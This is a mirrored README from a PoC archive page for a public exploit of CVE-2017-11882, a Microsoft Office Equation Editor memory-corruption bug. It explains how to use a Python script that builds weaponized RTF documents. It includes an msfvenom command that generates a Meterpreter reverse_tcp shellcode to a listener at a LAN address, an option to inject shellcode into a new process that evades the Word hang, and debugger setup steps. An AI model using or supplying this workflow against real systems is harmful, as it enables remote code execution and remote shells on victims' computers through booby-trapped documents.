Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2017-11882 PoC — Microsoft Office 安全漏洞

Source
https://github.com/rip1s/CVE-2017-11882
Associated Vulnerability
Title:Microsoft Office 安全漏洞 (CVE-2017-11882)
Description:Microsoft Office 2007 Service Pack 3, Microsoft Office 2010 Service Pack 2, Microsoft Office 2013 Service Pack 1, and Microsoft Office 2016 allow an attacker to run arbitrary code in the context of the current user by failing to properly handle objects in memory, aka "Microsoft Office Memory Corruption Vulnerability". This CVE ID is unique from CVE-2017-11884.
Description
CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.
Readme
# CVE-2017-11882 Exploit

CVE-2017-11882 Exploit accepts over 17k bytes long command/code in maximum.

For remote command execution,this exploit will call WinExec with SW_HIDE and call ExitProcess after WinExec returns.

For remote code execution,this exploit just jmp to code.

I cannot find a reference for the object structure...so I cannot change the file length for arbitrary length code execution..:(

But I do think 17k bytes is really enough. Python script will detect the payload size you need and choose the correct payload template.

**Caution: RCE will stuck winword process if you don't migrate to another process!**

Currently this exploit will inject your shellcode to new EQNEDT32.EXE process if you specify **-i** flag. **This operation is suspicious to AV but it won't stuck the word process.**

## Usage
```
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT

Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)

optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf
```

Example:

For remote command execution
```
CVE-2017-11882.py -c cmd.exe -o test.rtf
```

For remote code execution

1. Generate some shellcode

```
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
```

2. Generate exploit
```
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf
```
## Debug

 1. Set debugger value to your debugger path in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE

 2. Build an exploit and run it.
 
 3. Set break point at 0x41165f
 
 4. This break point will be hit twice, at second time the payload will be executed after this function returned.
 
 ## Reference
 
  1. https://github.com/embedi/CVE-2017-11882
  2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
  3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
File Snapshot

 [4.0K]  /data/pocs/1fc034dfd7c4ad415dfa6a9c35c1000681a56e2e
├── [ 45K]  CVE-2017-11882.py
├── [1.0K]  LICENSE
├── [2.3K]  README.md
└── [ 11K]  shellcode.c

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →